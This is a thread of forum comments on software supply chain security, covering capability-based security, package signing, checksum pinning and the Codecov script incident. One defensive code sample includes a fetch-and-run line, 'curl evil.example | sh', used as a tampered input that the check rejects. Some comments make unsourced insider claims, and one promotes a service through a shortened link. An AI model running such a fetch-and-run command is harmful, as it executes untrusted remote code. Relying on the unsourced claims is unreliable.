
IMO this is the missing puzzle piece (and the more important one for me personally) for software supply chain security, the others being deterministic builds and signed binaries.

And the real problem isn't even people trying to steal your bitcoins [1]: you notice that, and if you hadn't put all your eggs in one basket it's a (sometimes expensive) lesson in IT security. The much more serious threat is state-level actors trying to backdoor secure communication channels, where the breach will happen without your knowledge. One shouldn't expect every nation to take the obvious, public route of the Australian government [2] and simply demand access. With enough resources it seems entirely viable to backdoor just one deep dependency of some UI framework and circumvent all end-to-end encryption used by the affected apps.

I hope distributed code review will get some traction not only in the Rust world, but in the whole open source universe.

[1] https://news.ycombinator.com/item?id=18534392

[2] https://arstechnica.com/tech-policy/2018/12/signal-to-austra...




>The current software engineering paradigm has no meaningful answer to this, no matter what "security experts" tell you. In a sane industry this realization would lead to a change of the paradigm, but people in our industry seem to be only doubling down.

Capability-based security is one possible answer. The Austral language is trying to make this a first-class language feature:

>The problem is that code is overwhelmingly permissionless. Or, rather: all code has uniform root permissions. The size of today’s software ecosystems has introduced a new category of security vulnerability: the supply chain attack. An attacker adds malware to an innocent library used transitively by millions. It is downloaded and run, with the user’s permissions, on the computers of hundreds of thousands of programmers, and afterwards, on application servers.

>The solution is capability-based security. Code should be permissioned. To access the console, or the filesystem, or the network, libraries should require the capability to do so. Then it is evident, from function signatures, what each library is able to do, and what level of auditing is required.

https://austral.github.io/spec/rationale-capabilities


> It's an unbelievably gargantuan effort

Also applies to software supply chains:

https://www.platformsecuritysummit.com/2019/speaker/sherman/

> Today’s software is largely assembled rather than written, and most of the assembly comes from open source components. The creation of components and their inclusion into applications creates a “supply chain” just like in conventional manufacturing. While physical supply chains have well established chains-of-custody to establish properties like refrigeration maintenance, authenticity or spoilage avoidance, the software supply chain is very much a wild, wild west, filled with vulnerabilities that can be (and are) inadvertently inserted into applications. As supply chain risk and mitigations are being explored by government and academia, a larger attack surface is being uncovered that needs to be addressed.


>How do we even mitigate against these types of supply-chain attacks, aside from disabling run-scripts, using lockfiles and carefully auditing the entire dependency tree on every module update?

Don't trust the package distribution system - use public key crypto.
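To make the suggestion concrete, here is a minimal sketch of what "use public key crypto" could mean for package distribution: the registry signs each archive, and the client verifies against a pinned public key before installing. The function names (`signPackage`, `verifyPackage`) are illustrative, not any real registry's API; Node's Ed25519 support stands in for whatever signature scheme a real system would use.

```typescript
// Sketch: a registry signs each package archive with its private key;
// clients verify with a pinned public key before installing anything.
import { generateKeyPairSync, sign, verify } from "node:crypto";

// In practice the private key stays with the registry (or the package
// author) and only the public key is distributed to clients.
const { publicKey, privateKey } = generateKeyPairSync("ed25519");

// Registry side: sign the raw bytes of the archive.
function signPackage(archive: Buffer): Buffer {
  return sign(null, archive, privateKey);
}

// Client side: refuse to install unless the signature checks out.
function verifyPackage(archive: Buffer, signature: Buffer): boolean {
  return verify(null, archive, publicKey, signature);
}

const archive = Buffer.from("fake tarball bytes");
const sig = signPackage(archive);
console.log(verifyPackage(archive, sig));                    // true
console.log(verifyPackage(Buffer.from("tampered"), sig));    // false
```

Note this only authenticates *who* published the package, not *what* the code does: a compromised maintainer key, or a malicious maintainer, signs malware just as happily.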


I - and many others - don't think this is enough to mitigate supply chain attacks. It's too easy for a malicious developer to add cryptolocker ransomware in a point release. But I also don't think having a package in Debian will somehow magically solve this problem either. Debian package maintainers do not do security audits on the packages they add, and never have. It's magical thinking to assume using packages from Debian will somehow protect you from supply chain attacks. And asking developers to keep their dependency trees small to minimise the risk is a losing battle: using lots of small, popular dependencies is just too convenient.

There is a solution out there that I wish got more traction: capability-based security. The idea is simple: we partition programs into application code and library code. Library code can never access the filesystem or network (or other protected data) directly; application code can. And this is enforced by the compiler or language runtime. If you want a library to interact with a file, you first open the file in application code and pass the file handle to the library. Similar wrappers can be made for directories, network sockets and so on. If I want express to listen on a specific port, I pass it that port as a capability object, not just an integer (e.g. app.listen(net.listenPort(8000))). The amount of code that would need to be changed is tiny, since well-behaved libraries don't usually need many capabilities to do their job.
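The split described above can be sketched in TypeScript. This is only an illustration of the pattern, not an enforced mechanism (JavaScript gives libraries ambient access to `fs` anyway, which is exactly the language-level buy-in problem); all names here are made up for the example.

```typescript
// Application code opens the file and hands the library a narrow
// capability object; library code only ever sees that object.
import { readFileSync, writeFileSync } from "node:fs";
import { tmpdir } from "node:os";
import { join } from "node:path";

// The only thing a library may receive: a handle that reads one file.
interface ReadCapability {
  read(): string;
}

// Application code: the sole place allowed to mint capabilities.
function openReadCapability(path: string): ReadCapability {
  return { read: () => readFileSync(path, "utf8") };
}

// Library code: can parse the bytes it is given, and nothing else.
// It cannot open other files, sockets, or spawn processes.
function countLines(cap: ReadCapability): number {
  return cap.read().split("\n").length;
}

// Demo: create a file, grant a capability to it, call the "library".
const path = join(tmpdir(), "cap-demo.txt");
writeFileSync(path, "a\nb\nc");
console.log(countLines(openReadCapability(path))); // 3
```

In a language that actually enforced this, `readFileSync` simply would not be importable from library code, so the signature `countLines(cap: ReadCapability)` would be an honest statement of everything the function can touch.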

It is ridiculous that my 3rd party json library can invisibly access all the sensitive files on my computer. With capabilities, we take that privilege away. I have no problem trusting a random json library if it literally only has access to the json string I pass it. If we had a capability based security model, I would have no qualms about pulling in hundreds of transitive dependencies. My libraries can still only access exactly what I pass them.

Unfortunately, solving this problem requires language-level buy-in. It would be very hard to retrofit Rust to work this way, and that'll probably never happen. Raw pointers and inline assembly also make a bit of a mess of things (though pointer provenance might help). But a man can dream… maybe in Rust's successor.


100%. I have plenty of insider knowledge here I sadly cannot share, but search for supply chain attacks and the sheer number of public headlines of known attacks can keep you busy for days. State actors are constantly trying to get footholds in software supply chains, and often succeed.

Consider that Intel ME firmware is a literal, well-documented backdoor that we do not allow on US government systems... only civilian ones.

Most of the time our adversaries do not need to be covert enough to mess with firmware. Consider OMA-DM apps that run on most phones with insane permissions taking orders from cell towers.

https://gist.github.com/thestinger/171b5ffdc54a50ee44497028a...

We cannot even keep public open source repos like NPM free of supply chain attacks. Proprietary blobs make it that much easier to hide things.

Also all you need to backdoor every encrypted messenger is a kernel module that ensures /dev/urandom is a bit less random on the devices of targeted dissidents and journalists. Now look at how many proprietary blobs from piles of random vendors we load into modern phone operating systems, even "open" android roms, and think about SolarWinds for a second.


I do not think I am missing out: a supply chain attack that included playing the long game and subverting the trust of the development community is the real issue, one the open source community has no defences against. The thwarted attack surpassed the scale of all previous supply chain attacks on the Node.js, Python and similar ecosystems, and it went deep down into the low-level technical layers as well.

The assault was comprehensive, holistic and systematic in its approach. This article does not mention it, but other reports have indicated that the person behind it also managed to compromise the PKI layer at the edge between OpenSSL and sshd, which brings an extra level of complexity to the backdoor.


> how fragile software supply chain security is, despite the abundance of tools and available security mechanisms

There seems to be a fundamental trade-off at play. I often see security portrayed as a hindrance, and its requirements as a drag on productivity. That is in line with a strong trend: developers with a very narrow skill set. The ability to throw frameworks at the wall and see what sticks pays very well. No one wants a stick in the mud asking why on Earth dependency management is in the state it is, or imposing reasonable security practices. I have been there; I have argued with developers from teams that had been breached before, saying "no, this is safe because I can't see how this could be exploited". Security by obscurity so deeply ingrained that one takes one's own obscurity as evidence of safety.


Totally agree with you. I think it's time to think carefully and start using services like Vulert (https://bit.ly/336DZub), which tracks your open-source software for free and notifies you in real time if any security issue is found in your application.

At least this way we can protect ourselves from supply chain attacks.





Ah, our old friend supply chain security.

This is a very, very hard problem to solve without some serious coordination and effort. To do this well you need to do all kinds of things like:

1. Verifying the authenticity of the software you're looking at. Is that really libxml or has someone fed you a poisoned package? Does it have a checksum? Is the registry or repository we pulled it from adequately secured?

2. Verifying the provenance of a particular version of a package. Who made this change? Why did they make it? Is the change safe?

3. Vetting the governance of a package or library. We may know of Apache and have some confidence in the governance of that project, but what about leftpad of Node.js/npm fame? Is that logging library we pulled into our Rust app from crates.io managed by a reputable OSS developer and/or company, or are the motivations of the entities building it uncertain? Can they be bought? Bought out? Sued? Blackmailed? If you're looking at this with the mindset of a state-sponsored organization that handles anything remotely important, these are not unreasonable considerations.

The list goes on and on. It helps if you're working in an ecosystem that has a high level of quality standards for the libraries or software packages being used, but there's always more to dig up the deeper you go into a dependency tree.

I'm of the opinion that supply chain attacks can be mitigated, but never eliminated. Having many eyes on a project helps (thanks to all of you working on projects with openly available sources!). We're still a long way from making our industry's tools and development processes naturally robust to these things, though I'm excited to see more dialog around these issues.


> These days it's practically a necessity for companies to shell out money to some sort of supply-chain protection software (Sonatype, Socket.dev etc.)

A number of serious assumptions here. How can you be sure that you're protected if you spend money on these commercial tools? It's an arms race, after all. There are other ways to protect yourself (pinning dependencies, allow lists), and a few open source tools are also available to audit code.


Great example of supply chain risks and attackers with a flexible approach here.

Why bother compromising a large number of hardened bank/government networks when you can backdoor a software update server that delivers code directly to the desktops of privileged users in those companies...

It's a tricky problem to solve, too. Automatic updates are very good for reducing the number of people running outdated and vulnerable code, but centralized software update servers become tempting targets for attackers.


That's only the case if I am able to review the code myself before any update, I fully understand the code, and I am smart enough that the contributors are unable to pull a fast one on me.

Given that I'm not a cryptography expert, I have a limited number of hours in the day, and open-source supply chain attacks are typically obfuscated, I don't consider that to be a trivial statement.


Securing supply chain is an important effort even outside of regulation. Here is a podcast about some recent open source efforts:

Kubernetes Podcast 155: Software Supply Chain Security, with Priya Wadhwa

https://kubernetespodcast.com/episode/155-software-supply-ch...


Supply chain attacks have great reach and often go undiscovered. Hence their popularity.

From the article:

The appeal of supply chain attacks to hackers is their breadth and effectiveness. By compromising a single player high in the software supply chain, hackers can potentially infect any person or organization who uses the compromised product. Another feature that hackers find beneficial: there's often little or nothing targets can do to detect malicious software distributed this way, because digital signatures will indicate that it's legitimate.

In the case of the backdoored bash script, however, it would have been easy for Codecov or any of its customers to detect the malice by doing nothing more than checking the shasum. That the malicious version escaped notice for three months indicates that no one bothered to perform this simple check.
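The check being described amounts to a few lines: compute the digest of the fetched script and compare it against a pinned value from an audited copy. A minimal sketch, with a stand-in script rather than the real Codecov uploader:

```typescript
// Sketch: pin the SHA-256 of the script version you audited, and
// refuse to execute any fetched copy whose digest does not match.
import { createHash } from "node:crypto";

function sha256(data: string | Buffer): string {
  return createHash("sha256").update(data).digest("hex");
}

// Digest recorded when the script was last audited (stand-in content).
const auditedScript = "#!/bin/bash\necho upload coverage";
const pinnedDigest = sha256(auditedScript);

// Gate that a CI step would run before piping the script to bash.
function safeToRun(fetched: string): boolean {
  return sha256(fetched) === pinnedDigest;
}

console.log(safeToRun(auditedScript));                              // true
console.log(safeToRun(auditedScript + "\ncurl evil.example | sh")); // false
```

The catch, of course, is that the pinned digest has to come from somewhere other than the same server that serves the script, otherwise the attacker just updates both.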


Nobody's going to use untrusted binaries/sources in this age of supply chain security..

Check out https://socket.dev/ Been super impressed by their approach to identifying and securing codebases against supply chain attacks (and I believe they have a special deal for open source repos too!)

Wonderful news. Supply chain security is a disaster because the majority of developers won't opt into any kind of security features. Mandating 2FA is the obvious solution, and we'll all be radically safer for it.

Glad to see GitHub pushing this; I hope package repositories follow suit!

